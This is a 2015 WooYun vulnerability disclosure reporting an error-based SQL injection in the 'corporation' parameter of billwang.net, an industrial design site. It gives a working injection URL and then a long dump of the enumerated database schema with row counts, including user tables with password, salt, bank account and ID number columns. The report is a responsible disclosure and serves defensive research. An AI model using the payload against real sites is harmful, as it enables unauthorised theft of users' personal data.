当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128304

漏洞标题:BillWang工业设计网站SQL漏洞(40W+用户资料泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 渔村安全实验室

提交时间:2015-07-22 12:45

修复时间:2015-09-10 08:16

公开时间:2015-09-10 08:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

http://www.billwang.net/alliance.php?act=alliancecase&corporation=0&page=2
报错注入,corporation参数所导致的SQL漏洞
http://www.billwang.net/alliance.php?act=alliancecase&corporation=0 AND (SELECT 1522 FROM(SELECT COUNT(*),CONCAT(0x7e,0x21,database(),0x21,0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) &page=2

2015-07-22_104904.png


<code>
bwcms
adm
count:55
id
tag
title
totaldisplay
totalclick
todaydisplay
todayclick
customcode
media
link
width
height
expiration
note
alliancepic
count:11
id
picture
tourl
class
state
free
category
count:132
id
title
father
comments
count:300110
id
username
homepage
email
entryid
message
time
userid
config
count:5
id
key
data
drawlog
count:16
id
userid
amount
time
status
finish
message
type
entry
count:17311
id
title
draft
userid
time
category
message
views
reply
auditing
description
recommend
rating
extrainfo
pin
employer_pin
categorysub
buylink
vote
redirect
entrybalancebank
count:61
id
phone
bank
bank_alias
bank_account
name
userid
entrybalancelog
count:4001
id
userid
entryid
type
title
location
balance
operateid
message
time
eventcompany
count:497
id
user_id
company_id
event_id
detail
lasttime
userslist
status
free
events
count:70
id
categoryid
datelimit_start
datelimit_end
description
rule
award
contact
attach
entry_privacy
can_poll
time
title
contact_privacy
createuserid
can_credit
polldate_start
polldate_end
expired
eventscreditlog
count:2
id
entryid
userid
credit
message
time
type
eventsentry
count:220
id
title
draft
userid
time
category
message
views
reply
auditing
description
recommend
rating
extrainfo
pin
employer_pin
categorysub
buylink
vote
redirect
eventseventsusers
count:11012
id
username
sex
phone
IDNo
address
QQ
bank
bank_alias
bank_account
email
teacher
myother
wantaddress
eventid
balance
credit
status
free
open
eventsfiles
count:18
id
filename
entryid
location
time
eventsgrade
count:2
id
entryid
eventid
pid
message
grade
state
kind
time
eventsperm
count:0
id
userid
eventid
eventspictures
count:65
id
title
location
time
entryid
eventsusers
count:52
id
userid
username
sex
phone
IDNo
address
QQ
specialty
bank
bank_alias
bank_account
stuid
jointime
email
teacher
myother
employment_type
wantaddress
eventid
balance
credit
status
free
open
eventvotelog
count:6588
id
userid
entryid
time
files
count:1695
id
filename
entryid
location
time
grade
count:2216
id
entryid
userid
pid
grade
state
kind
time
members
count:9
id
usergroupid
userid
notice
count:7
id
notice
noturl
class
endtime
state
free
pictures
count:58300
id
title
location
time
entryid
priority
count:10
id
toid
area
lasttime
state
free
rating
count:2635
id
userid
rating
entryid
time
ip
tagcloud
count:10483
id
title
total
taglog
count:23729
id
title
entryid
usergroup
count:4
id
title
permission
xq_check
count:502
id
displayname
stuid
type
xq_massage
count:16
id
eventid
userid
message
time
bwgroup
category
count:8
id
title
groups
fellowship
count:148
id
groupid
targetid
groups
count:599
id
title
description
ownid
members
threads
replys
pictures
logo
banner
createtime
updatetime
categoryid
private
recommend
members
count:8414
id
userid
groupid
jointime
isadmin
isban
pageviews
count:112452
id
groupid
userid
pageviews
pictures
count:29814
id
groupid
filename
userid
time
downloads
title
threadid
trackid
picturespostcache
count:1486
userid
groupid
pid
recommendtrack
count:180
id
userid
groupid
time
replys
count:2732
id
threadid
message
time
posterid
agree
disagree
request
count:179
id
type
groupid
userid
time
message
sets
count:449
id
groupid
pictures
title
userid
setstrack
count:7966
id
setid
pid
taglog
count:2987
id
title
groupid
tags
count:602
id
title
total
threads
count:1278
id
title
starttime
updatetime
message
posterid
groupid
replys
iconid
lastposterid
views
locked
goodness
sticky
track
count:10721
id
userid
time
groupid
action
targetid
message
isserialize
bwi
banned
count:436
id
userid
reason
expiration
time
checkuser
count:17276
id
userid
checkcode
use
time
dservice
count:7
id
userid
goodname
linkman
phone
company
relationtype
relationadress
describe
remark
subtime
free
favorite
count:17272
id
userid
item
time
type
folder
favoritefolder
count:229
id
title
userid
type
guestbook
count:675
id
userid
posterid
content
time
father
payment
count:2182
id
billingid
userid
plan
num
time
status
amount
invoice
invoiceinfo
invoicesend
product
picture
count:0
id
type
relationid
title
location
pm
count:273227
id
opentime
userid
fromid
sentid
senttime
title
content
time
unread
remind
resume
count:16354
id
userid
sex
birthday-y
birthday-m
work-y
live_state
live_city
telephone
rating
teid
employment_type
work_state_type
work_state
work_city
job_description
open_telephone
academy
privacy
banned_company
speciality
verification
retime
specialtys
count:68271
id
userid
sid
suggest
count:0
id
userid
touserid
companyid
suggest
lasttime
state
territory
count:46
id
parentid
tname
theme
count:722
id
user_id
company_logo
company_state
company_lun
phone
private
public
different
style
activation
time
end_time
msg
state
free
themecheck
count:136
id
userid
companyid
time
state
free
track
count:1137460
id
userid
item
type
ownid
time
iscompany
user
count:135965
id
username
email
displayname
city
state
country
email_confirmation
description
homepage
avatar
specialties
work_state
experience
job
comment_work
jointime
lastactivity
lastip
iscompany
vbuserid
pmimported
vip_read
vip_read_start
balance
submit_agreement
userconfig
count:40899
id
userid
typename
time
cid
change
status
active
works
count:0
id
userid
territoryid
title
location
active
bwjobs
case
count:3311
id
title
corporation
description
date
userid
time
attachment
corporationcustom
caseconfig
count:4
id
userid
time
active
category
count:71
id
type
title
comment
count:8351
id
userid
content
time
item
type
company
count:2990
id
userid
company
address
logo
website
description
check
linkman
telephone
online
email
job
state
city
publish_balance
free_balance
isdemand
demand_publish_balance
demand_free_balance
download
licence
licence_status
config
count:5
id
name
data
consumelog
count:20053
id
ctype
userid
jobid
title
time
action
corporation
count:19
id
title
state
deletelog
count:1766
id
type
itemid
log
userid
companyid
demand
count:23
id
title
category_id
description
price
contact
phone
status
target_company_id
time
close_time
userid
auditing
state
city
folder
count:19879
id
userid
category
title
type
index
views
lastupdate
favorite
private
gallery
count:151772
id
userid
title
views
category
time
location
folder
description
comment
favorite
private
rating
resumestatus
inpourhistory
count:3904
id
companyid
operating
numbers
time
notice
inpourinfinity
count:41
id
companyid
invalidation
plan
planupdate
job
count:9028
id
userid
level
functions
description
time
price
category
state
city
views
favorite
skill_description
active
email
address
telephone
contact
archive
draft
ispaid
jobcomment
count:2158
id
userid
message
replyid
time
jobid
lun
count:0
id
location
title
type
redirect
order
need
count:15
id
userid
category_id
title
content
nfiles
fixed
crowd
ages
market
opponent
linkman
telphone
qq
price
draft
time
close_time
state
city
status
remarks
active
portfoliocate
count:6
id
title
portfoliolib
count:937
id
workid
categoryid
time
views
rating
count:10348
id
userid
rating
item
time
resumedown
count:36
id
userid
companyuserid
time
resumetrack
count:213240
id
userid
jobid
message
time
skill
count:56417
id
job
sid
archive
draft
active
specialty
count:32
id
title
taglog
count:20598
id
type
title
item
tags
count:6148
id
title
total
type
top
count:0
id
title
location
redirect
type
order
uploadqueue
count:8346
id
userid
addon
type
wap_company
count:10
id
companyid
state
city
sort_order
bwmint
mint__config
count:1
id
cfg
data
mint_outbound
count:11717
id
to
to_checksum
to_title
to_full_checksum
from
from_checksum
from_title
session_checksum
dt
mint_visit
count:101474
id
dt
referer
referer_checksum
domain_checksum
referer_is_local
resource
resource_checksum
resource_title
search_terms
img_search_found
browser_family
browser_version
platform
resolution
flash_version
local_search_terms
local_search_found
window_width
window_height
since1968_language
comicgroup
category
count:1
id
title
groups
groups
count:5
id
title
description
ownid
members
threads
replys
pictures
logo
banner
createtime
updatetime
categoryid
private
members
count:0
id
userid
groupid
jointime
isadmin
isban
pictures
count:33
id
groupid
filename
userid
time
downloads
title
threadid
picturespostcache
count:33
userid
groupid
pid
replys
count:1
id
threadid
message
time
posterid
request
count:0
id
type
groupid
userid
time
message
sets
count:2
id
groupid
pictures
title
userid
setstrack
count:32
id
setid
pid
taglog
count:3
id
title
groupid
tags
count:5
id
title
total
threads
count:1
id
title
starttime
updatetime
message
posterid
groupid
replys
iconid
lastposterid
views
locked
designbw
bwdaaggregate_temp_1319868600
count:0
attachmentid
views
bwdaaggregate_temp_1320732600
count:0
attachmentid
views
bwdaccess
count:183
userid
forumid
accessmask
bwdadminhelp
count:1607
adminhelpid
script
action
optionname
displayorder
volatile
product
bwdadministrator
count:8
userid
adminpermissions
navprefs
cssprefs
notes
dismissednews
languageid
bwdadminlog
count:23669
adminlogid
userid
dateline
script
action
extrainfo
ipaddress
bwdadminmessage
count:0
adminmessageid
varname
dismissable
script
action
execurl
method
dateline
status
statususerid
bwdadminutil
count:1
title
text
bwdadv_setting
count:3
varname
grouptitle
value
defaultvalue
optioncode
displayorder
serialize
bwdadv_settinggroup
count:1
grouptitle
displayorder
bwdalbum
count:28
albumid
userid
createdate
lastpicturedate
visible
moderation
title
description
state
coverpictureid
bwdalbumpicture
count:32
albumid
pictureid
dateline
bwdannouncement
count:14
announcementid
title
userid
startdate
enddate
pagetext
forumid
views
announcementoptions
bwdannouncementread
count:688
announcementid
userid
bwdattachment
count:95530
attachmentid
userid
dateline
thumbnail_dateline
filename
filedata
visible
counter
filesize
postid
filehash
posthash
thumbnail
thumbnail_filesize
extension
bwdattachmentpermission
count:0
attachmentpermissionid
extension
usergroupid
size
width
height
attachmentpermissions
bwdattachmenttype
count:9
extension
mimetype
size
width
height
enabled
display
thumbnail
newwindow
bwdattachmentviews
count:5
attachmentid
bwdavatar
count:0
avatarid
title
minimumposts
avatarpath
imagecategoryid
displayorder
bwdaward
count:1
award_id
award_cat_id
award_name
award_desc
award_icon_url
award_img_url
award_displayorder
award_allowrequest
award_active
bwdaward_cat
count:1
award_cat_id
award_cat_title
award_cat_desc
award_cat_displayorder
award_cat_parentid
bwdaward_user
count:1
issue_id
award_id
userid
issue_reason
issue_time
bwdbbcode
count:1
bbcodeid
bbcodetag
bbcodereplacement
bbcodeexample
bbcodeexplanation
twoparams
title
buttonimage
options
bwdbookmarksite
count:17
bookmarksiteid
title
iconpath
active
displayorder
url
bwdcalendar
count:1
calendarid
title
description
displayorder
neweventemail
moderatenew
startofweek
options
cutoff
eventcount
birthdaycount
startyear
endyear
holidays
bwdcalendarcustomfield
count:0
calendarcustomfieldid
calendarid
title
description
options
allowentry
required
length
bwdcalendarmoderator
count:0
calendarmoderatorid
userid
calendarid
neweventemail
permissions
bwdcalendarpermission
count:0
calendarpermissionid
calendarid
usergroupid
calendarpermissions
bwdcpsession
count:0
userid
hash
dateline
bwdcredit_uplevel
count:0
id
mincredit
usergroup
bwdcron
count:20
cronid
nextrun
weekday
day
hour
minute
filename
loglevel
active
varname
volatile
product
bwdcronlog
count:56992
cronlogid
varname
dateline
description
type
bwdcustomavatar
count:6087
userid
filedata
dateline
filename
visible
filesize
width
height
filedata_thumb
width_thumb
height_thumb
bwdcustomprofilepic
count:0
userid
filedata
dateline
filename
visible
filesize
width
height
bwddatastore
count:30
title
data
unserialize
bwddeletionlog
count:8360
primaryid
type
userid
username
reason
dateline
bwdeditlog
count:16311
postid
userid
username
dateline
reason
hashistory
bwdevent
count:1
eventid
userid
event
title
allowsmilies
recurring
recuroption
calendarid
customfields
visible
dateline
utc
dst
dateline_from
dateline_to
bwdexternalcache
count:8
cachehash
text
headers
dateline
forumid
bwdfaq
count:42
faqname
faqparent
displayorder
volatile
product
bwdforum
count:47
forumid
styleid
title
title_clean
description
description_clean
options
showprivate
displayorder
replycount
lastpost
lastposter
lastpostid
lastthread
lastthreadid
lasticonid
lastprefixid
threadcount
daysprune
newpostemail
newthreademail
parentid
parentlist
password
link
childlist
defaultsortfield
defaultsortorder
imageprefix
vbseo_moderatepingbacks
vbseo_moderatetrackbacks
vbseo_moderaterefbacks
g_answer_forum
bwdforumpermission
count:62
forumpermissionid
forumid
usergroupid
forumpermissions
bwdforumprefixset
count:13
forumid
prefixsetid
bwdforumread
count:0
userid
forumid
readtime
bwdgroupmessage
count:23
gmid
groupid
postuserid
postusername
dateline
state
title
pagetext
ipaddress
allowsmilie
reportthreadid
bwdgroupmessage_hash
count:23
postuserid
groupid
dupehash
dateline
bwdholiday
count:0
holidayid
varname
recurring
recuroption
allowsmilies
bwdhumanverify
count:0
hash
answer
dateline
viewed
bwdhvanswer
count:0
answerid
questionid
answer
dateline
bwdhvquestion
count:0
questionid
regex
dateline
bwdicon
count:14
iconid
title
iconpath
imagecategoryid
displayorder
bwdimagecategory
count:3
imagecategoryid
title
imagetype
displayorder
bwdimagecategorypermission
count:0
imagecategoryid
usergroupid
bwdinfraction
count:484
infractionid
infractionlevelid
postid
userid
whoadded
points
dateline
note
action
actiondateline
actionuserid
actionreason
expires
threadid
customreason
bwdinfractionban
count:5
infractionbanid
usergroupid
banusergroupid
amount
period
method
bwdinfractiongroup
count:0
infractiongroupid
usergroupid
orusergroupid
pointlevel
override
bwdinfractionlevel
count:4
infractionlevelid
points
expires
period
warning
extend
bwdlanguage
count:2
languageid
title
userselect
options
languagecode
charset
imagesoverride
dateoverride
timeoverride
registereddateoverride
calformat1override
calformat2override
logdateoverride
locale
decimalsep
thousandsep
phrasegroup_global
phrasegroup_cpglobal
phrasegroup_cppermission
phrasegroup_forum
phrasegroup_calendar
phrasegroup_attachment_image
phrasegroup_style
phrasegroup_logging
phrasegroup_cphome
phrasegroup_promotion
phrasegroup_user
phrasegroup_help_faq
phrasegroup_sql
phrasegroup_subscription
phrasegroup_language
phrasegroup_bbcode
phrasegroup_stats
phrasegroup_diagnostic
phrasegroup_maintenance
phrasegroup_profilefield
phrasegroup_thread
phrasegroup_timezone
phrasegroup_banning
phrasegroup_reputation
phrasegroup_wol
phrasegroup_threadmanage
phrasegroup_pm
phrasegroup_cpuser
phrasegroup_accessmask
phrasegroup_cron
phrasegroup_moderator
phrasegroup_cpoption
phrasegroup_cprank
phrasegroup_cpusergroup
phrasegroup_holiday
phrasegroup_posting
phrasegroup_poll
phrasegroup_fronthelp
phrasegroup_register
phrasegroup_search
phrasegroup_showthread
phrasegroup_postbit
phrasegroup_forumdisplay
phrasegroup_messaging
phrasegroup_inlinemod
phrasegroup_plugins
phrasegroup_cprofilefield
phrasegroup_reputationlevel
phrasegroup_infraction
phrasegroup_infractionlevel
phrasegroup_notice
phrasegroup_prefix
phrasegroup_prefixadmin
phrasegroup_album
phrasegroup_socialgroups
phrasegroup_autopm_text
phrasegroup_autopm_title
phrasegroup_award
bwdmailqueue
count:0
mailqueueid
dateline
toemail
fromemail
subject
message
header
bwdmoderation
count:0
primaryid
type
dateline
bwdmoderator
count:59
moderatorid
userid
forumid
permissions
permissions2
bwdmoderatorlog
count:34614
moderatorlogid
dateline
userid
forumid
threadid
postid
pollid
attachmentid
action
type
threadtitle
ipaddress
product
id1
id2
id3
id4
id5
bwdnotice
count:6
noticeid
title
displayorder
persistent
active
bwdnoticecriteria
count:6
noticeid
criteriaid
condition1
condition2
condition3
bwdpasswordhistory
count:141757
userid
password
passworddate
bwdpaymentapi
count:7
paymentapiid
title
currency
recurring
classname
active
settings
bwdpaymentinfo
count:0
paymentinfoid
hash
subscriptionid
subscriptionsubid
userid
completed
bwdpaymenttransaction
count:0
paymenttransactionid
paymentinfoid
transactionid
state
amount
currency
dateline
paymentapiid
request
reversed
bwdphrase
count:18236
phraseid
languageid
varname
fieldname
text
product
username
dateline
version
bwdphrasetype
count:68
fieldname
title
editrows
product
special
bwdpicture
count:32
pictureid
userid
caption
extension
filedata
filesize
width
height
thumbnail
thumbnail_filesize
thumbnail_width
thumbnail_height
thumbnail_dateline
idhash
reportthreadid
state
bwdpicturecomment
count:1
commentid
pictureid
postuserid
postusername
dateline
state
title
pagetext
ipaddress
allowsmilie
reportthreadid
messageread
bwdpicturecomment_hash
count:1
postuserid
pictureid
dupehash
dateline
bwdplugin
count:133
pluginid
title
hookname
phpcode
product
devkey
active
executionorder
bwdpm
count:10288
pmid
pmtextid
userid
folderid
messageread
bwdpmreceipt
count:49
pmid
userid
touserid
tousername
title
sendtime
readtime
denied
bwdpmtext
count:5231
pmtextid
fromuserid
fromusername
title
message
touserarray
iconid
dateline
showsignature
allowsmilie
bwdpodcast
count:0
forumid
author
category
image
explicit
enabled
keywords
owneremail
ownername
subtitle
summary
categoryid
bwdpodcastitem
count:0
postid
url
length
explicit
keywords
subtitle
author
bwdpoll
count:24
pollid
question
dateline
options
votes
active
numberoptions
timeout
multiple
voters
public
lastvote
bwdpollvote
count:4931
pollvoteid
pollid
userid
votedate
voteoption
votetype
bwdpost
count:2721451
postid
threadid
parentid
username
userid
title
dateline
pagetext
allowsmilie
showsignature
ipaddress
iconid
visible
attach
infraction
reportthreadid
titleindex
pagetextindex
totalcredit
viewcredit
post_thanks_amount
price
bwdpost_credit_log
count:753
id
pid
credit
message
userid
username
time
type
bwdpost_thanks
count:8957
id
userid
username
date
postid
bwdpostedithistory
count:50158
postedithistoryid
postid
userid
username
title
iconid
dateline
reason
original
pagetext
bwdposthash
count:0
userid
threadid
postid
dupehash
dateline
bwdpostindex
count:0
wordid
postid
intitle
score
bwdpostlog
count:2
postid
useragent
ip
dateline
bwdpostparsed
count:662
postid
dateline
styleid
languageid
hasimages
pagetext_html
bwdprefix
count:55
prefixid
prefixsetid
displayorder
bwdprefixset
count:13
prefixsetid
displayorder
bwdproduct
count:12
productid
title
description
version
active
url
versioncheckurl
bwdproductcode
count:17
productcodeid
productid
version
installcode
uninstallcode
bwdproductdependency
count:6
productdependencyid
productid
dependencytype
parentproductid
minversion
maxversion
bwdprofilefield
count:4
profilefieldid
profilefieldcategoryid
required
hidden
maxlength
size
displayorder
editable
type
data
height
def
optional
searchable
memberlist
regex
form
html
perline
bwdprofilefieldcategory
count:0
profilefieldcategoryid
displayorder
location
bwdprofilevisitor
count:1443
userid
visitorid
dateline
visible
bwdranks
count:0
rankid
minposts
ranklevel
rankimg
usergroupid
type
stack
display
bwdreminder
count:0
reminderid
userid
title
text
duedate
adminonly
completedby
completedtime
bwdreputation
count:52
reputationid
postid
userid
reputation
whoadded
reason
dateline
bwdreputationlevel
count:11
reputationlevelid
minimumreputation
bwdrssfeed
count:0
rssfeedid
title
url
port
ttl
maxresults
userid
forumid
prefixid
iconid
titletemplate
bodytemplate
searchwords
itemtype
threadactiondelay
endannouncement
options
lastrun
bwdrsslog
count:0
rssfeedid
itemid
itemtype
uniquehash
contenthash
dateline
threadactiontime
threadactioncomplete
bwdsearch
count:6
searchid
userid
ipaddress
personal
query
searchuser
forumchoice
prefixchoice
sortby
sortorder
searchtime
showposts
orderedids
announceids
dateline
searchterms
displayterms
searchhash
titleonly
completed
bwdsession
count:342
sessionhash
userid
host
idhash
lastactivity
location
useragent
styleid
languageid
loggedin
inforum
inthread
incalendar
badlocation
bypass
profileupdate
bwdsetting
count:520
varname
grouptitle
value
defaultvalue
optioncode
displayorder
advanced
volatile
datatype
product
validationcode
blacklist
bwdsettinggroup
count:59
grouptitle
displayorder
volatile
product
bwdsigparsed
count:7272
userid
styleid
languageid
signatureparsed
hasimages
bwdsigpic
count:302
userid
filedata
dateline
filename
visible
filesize
width
height
bwdsmilie
count:56
smilieid
title
smilietext
smiliepath
imagecategoryid
displayorder
bwdsocialgroup
count:6
groupid
name
nameindex
description
descriptionindex
creatoruserid
dateline
members
picturecount
lastpost
lastposter
lastposterid
lastgmid
visible
deleted
moderation
type
moderatedmembers
options
bwdsocialgroupmember
count:34
userid
groupid
dateline
type
bwdsocialgrouppicture
count:3
groupid
pictureid
dateline
bwdspamlog
count:0
postid
bwdstats
count:2586
dateline
nuser
nthread
npost
ausers
bwdstrikes
count:0
striketime
strikeip
username
bwdstyle
count:4
styleid
title
parentid
parentlist
templatelist
csscolors
css
stylevars
replacements
editorstyles
userselect
displayorder
bwdsubscribeevent
count:0
subscribeeventid
userid
eventid
lastreminder
reminder
bwdsubscribeforum
count:21
subscribeforumid
userid
forumid
emailupdate
bwdsubscribethread
count:43186
subscribethreadid
userid
threadid
emailupdate
folderid
canview
bwdsubscription
count:0
subscriptionid
varname
cost
forums
nusergroupid
membergroupids
active
options
displayorder
adminoptions
bwdsubscriptionlog
count:0
subscriptionlogid
subscriptionid
userid
pusergroupid
status
regdate
expirydate
bwdsubscriptionpermission
count:0
subscriptionpermissionid
subscriptionid
usergroupid
bwdtachyforumcounter
count:0
userid
forumid
threadcount
replycount
bwdtachyforumpost
count:0
userid
forumid
lastpost
lastposter
lastpostid
lastthread
lastthreadid
lasticonid
lastprefixid
bwdtachythreadcounter
count:0
userid
threadid
replycount
bwdtachythreadpost
count:0
userid
threadid
lastpost
lastposter
lastpostid
bwdtag
count:278
tagid
tagtext
dateline
bwdtaggregate_temp_1229986560
count:0
threadid
views
bwdtaggregate_temp_1230612960
count:0
threadid
views
bwdtaggregate_temp_1318308960
count:0
threadid
views
bwdtaggregate_temp_1319820960
count:0
threadid
views
bwdtaggregate_temp_1319867760
count:0
threadid
views
bwdtaggregate_temp_1319961360
count:0
threadid
views
bwdtagsearch
count:98517
tagid
dateline
bwdtagthread
count:641
tagid
threadid
userid
dateline
bwdtemplate
count:1004
templateid
styleid
title
template
template_un
templatetype
dateline
username
version
product
bwdtemplatehistory
count:7
templatehistoryid
styleid
title
template
dateline
username
version
comment
bwdthread
count:159021
threadid
title
prefixid
firstpostid
lastpostid
lastpost
forumid
pollid
open
replycount
hiddencount
deletedcount
postusername
postuserid
lastposter
dateline
views
iconid
notes
visible
sticky
goodness
votenum
votetotal
attach
similar
taglist
titleindex
totalcredit
vbseo_linkbacks_no
globalsticky
g_answer_forum_answer
bwdthreadrate
count:295
threadrateid
threadid
userid
vote
ipaddress
bwdthreadread
count:0
userid
threadid
readtime
bwdthreadredirect
count:0
threadid
expires
bwdthreadviews
count:911
threadid
bwdupgradelog
count:1
upgradelogid
script
steptitle
step
startat
perpage
dateline
bwduser
count:428691
userid
usergroupid
membergroupids
displaygroupid
username
password
passworddate
email
styleid
parentemail
homepage
qq
icq
aim
yahoo
msn
skype
showvbcode
showbirthday
usertitle
customtitle
joindate
daysprune
lastvisit
lastactivity
lastpost
lastpostid
posts
reputation
reputationlevelid
timezoneoffset
pmpopup
avatarid
avatarrevision
profilepicrevision
sigpicrevision
options
birthday
birthday_search
maxposts
startofweek
ipaddress
referrerid
languageid
emailstamp
threadedmode
autosubscribe
pmtotal
pmunread
salt
ipoints
infractions
warnings
infractiongroupids
infractiongroupid
adminoptions
profilevisits
friendcount
friendreqcount
vmunreadcount
vmmoderatedcount
socgroupinvitecount
socgroupreqcount
pcunreadcount
pcmoderatedcount
gmmoderatedcount
utscore
ncode_imageresizer_mode
ncode_imageresizer_maxwidth
ncode_imageresizer_maxheight
credit
post_thanks_user_amount
post_thanks_thanked_posts
post_thanks_thanked_times
forum_answers
bwduseractivation
count:185
useractivationid
userid
dateline
activationid
type
usergroupid
emailchange
bwduserban
count:824
userid
usergroupid
displaygroupid
usertitle
customtitle
adminid
bandate
liftdate
reason
bwduserchangelog
count:25504
changeid
userid
fieldname
newvalue
oldvalue
adminid
change_time
change_uniq
bwdusercss
count:42
userid
selector
property
value
bwdusercsscache
count:10
userid
cachedcss
buildpermissions
bwduserfield
count:428728
userid
temp
field1
field2
field3
field4
bwdusergroup
count:18
usergroupid
title
description
usertitle
passwordexpires
passwordhistory
pmquota
pmsendmax
opentag
closetag
canoverride
ispublicgroup
forumpermissions
pmpermissions
calendarpermissions
wolpermissions
adminpermissions
genericpermissions
genericpermissions2
genericoptions
signaturepermissions
visitormessagepermissions
attachlimit
avatarmaxwidth
avatarmaxheight
avatarmaxsize
profilepicmaxwidth
profilepicmaxheight
profilepicmaxsize
sigpicmaxwidth
sigpicmaxheight
sigpicmaxsize
sigmaximages
sigmaxsizebbcode
sigmaxchars
sigmaxrawchars
sigmaxlines
usercsspermissions
albumpermissions
albumpicmaxwidth
albumpicmaxheight
albumpicmaxsize
albummaxpics
albummaxsize
socialgrouppermissions
awardpermissions
answers_forum_perms
bwdusergroupleader
count:0
usergroupleaderid
userid
usergroupid
bwdusergrouprequest
count:0
usergrouprequestid
userid
usergroupid
reason
dateline
bwduserlist
count:2376
userid
relationid
type
friend
bwdusernote
count:1
usernoteid
userid
posterid
username
dateline
message
title
allowsmilies
bwduserpromotion
count:8
userpromotionid
usergroupid
joinusergroupid
reputation
date
posts
strategy
type
bwdusertextfield
count:428728
userid
subfolders
pmfolders
buddylist
ignorelist
signature
searchprefs
rank
bwdusertitle
count:0
usertitleid
minposts
title
bwdvbseo_blacklist
count:1
l_domain
l_type
l_dateline
l_hits
l_deleted
bwdvbseo_linkback
count:0
t_id
t_time
t_src_url
t_dest_url
t_type
t_postid
t_postcount
t_threadid
t_page
t_title
t_text
t_approve
t_wait
t_incoming
t_deleted
t_hits
bwdvbseo_serviceupdate
count:0
s_threadid
s_updated
s_dateline
s_type
bwdvisitormessage
count:97
vmid
userid
postuserid
postusername
dateline
state
title
pagetext
ipaddress
allowsmilie
reportthreadid
messageread
bwdvisitormessage_hash
count:0
postuserid
userid
dupehash
dateline
bwdword
count:0
wordid
title
score
dateline
myweb
xwb22_account_proxy
count:0
id
sina_uid
screen_name
token
secret
xwb22_ad
count:3
id
content
using
add_time
name
description
page
flag
config
width
height
remarks
xwb22_admin
count:2
id
sina_uid
pwd
add_time
is_root
group_id
xwb22_admin_group
count:3
gid
group_name
permissions
description
xwb22_celeb
count:0
c_id1
c_id2
char_index
sina_uid
nick
face
verified
sort
add_time
id
xwb22_celeb_category
count:0
id
parent_id
name
sort
add_time
status
recommended
color
xwb22_comment_copy
count:242
cid
sina_uid
uid
mid
m_uid
reply_cid
reply_uid
content
source
post_ip
dateline
sina_nick
disabled
xwb22_comment_delete
count:0
id
sina_uid
sina_nick
mid
reply_cid
content
post_ip
dateline
add_time
xwb22_comment_verify
count:0
id
sina_uid
sina_nick
token
token_secret
mid
reply_cid
content
post_ip
dateline
forward
xwb22_component_cfg
count:28
component_id
cfgName
cfgValue
desc
xwb22_component_topic
count:1
id
topic_id
topic
date_time
sort_num
ext1
xwb22_component_topiclist
count:2
topic_id
topic_name
native
sort
app_with
type
xwb22_component_usergroups
count:2
group_id
group_name
native
related_id
type
xwb22_component_users
count:2
group_id
uid
sort_num
nickname
remark
id
xwb22_components
count:20
component_id
name
title
type
native
component_type
symbol
desc
preview_img
component_cty
xwb22_content_unit
count:0
id
unit_name
title
width
height
target
type
skin
colors
show_title
show_border
show_logo
show_publish
auto_scroll
add_time
xwb22_disable_items
count:0
kw_id
type
item
comment
admin_name
admin_id
user
publish_time
add_time
xwb22_event_comment
count:0
event_id
wb_id
weibo
comment_time
xwb22_event_join
count:0
sina_uid
event_id
contact
notes
join_time
xwb22_events
count:0
id
title
addr
desc
cost
sina_uid
nickname
realname
phone
start_time
end_time
pic
wb_id
join_num
view_num
comment_num
state
other
modify_time
add_time
add_ip
xwb22_feedback
count:1744
id
content
uid
nickname
mail
qq
tel
addtime
ip
xwb22_interview_wb
count:0
ask_id
answer_wb
interview_id
state
ask_uid
answer_uid
weibo
answer_weibo
xwb22_interview_wb_atme
count:0
interview_id
ask_id
at_uid
answer_wb
weibo
xwb22_item_groups
count:1
id
group_id
item_id
item_name
sort_num
xwb22_keep_userdomain
count:17
keep_domain
xwb22_local_pm_content
count:7
id
iid
sender_id
recipient_id
created_at
recipient_unread
last_del_uid
text
xwb22_local_pm_index
count:7
iid
actors
xwb22_local_pm_index_user
count:14
sina_uid
iid
unread_count
total_number
lasttime
last_id
last_data
xwb22_log_error
count:0
id
soft
version
akey
type
level
msg
extra
log_time
xwb22_log_error_api
count:0
id
soft
version
akey
type
level
msg
extra
log_time
xwb22_log_http
count:0
id
url
base_string
key_string
http_code
ret
post_data
request_time
total_time
s_ip
log_time
xwb22_log_info
count:0
id
soft
version
akey
type
level
msg
extra
log_time
xwb22_log_info_api
count:0
id
soft
version
akey
type
level
msg
extra
log_time
xwb22_micro_interview
count:0
id
title
desc
banner_img
cover_img
state
wb_state
master
guest
backgroup_img
backgroup_color
start_time
end_time
add_time
backgroup_style
custom_color
notice_time
xwb22_micro_live
count:0
id
title
trends
desc
code
start_time
end_time
master
guest
banner_img
cover_img
backgroup_img
backgroup_style
backgroup_color
custom_color
state
wb_state
notice_time
add_time
xwb22_micro_live_wb
count:0
live_id
wb_id
weibo
type
state
add_time
xwb22_nav
count:8
id
name
parent_id
in_use
sort_num
page_id
is_blank
url
type
isNative
xwb22_notice
count:0
notice_id
sender_id
title
content
add_time
available_time
xwb22_notice_recipients
count:0
kid
notice_id
recipient_id
xwb22_page_manager
count:22
page_id
component_id
title
position
sort_num
in_use
id
isNative
param
xwb22_page_prototype
count:2
id
name
desc
type
components
url
xwb22_pages
count:12
page_id
page_name
desc
native
url
prototype_id
type
params
xwb22_plugins
count:5
plugin_id
title
desc
in_use
xwb22_profile_ad
count:0
link_id
title
link
add_time
xwb22_sessions
count:0
sesskey
expiry
value
xwb22_skin_groups
count:0
style_id
style_name
sort_num
xwb22_skins
count:11
skin_id
name
directory
desc
state
style_id
sort_num
xwb22_subject
count:6
id
sina_uid
subject
is_use
xwb22_sys_config
count:52
key
value
group_id
xwb22_today_topics
count:0
group_id
topic
effect_time
xwb22_user_action
count:1
id
sina_uid
action_type
xwb22_user_ban
count:0
id
sina_uid
ban_time
nick
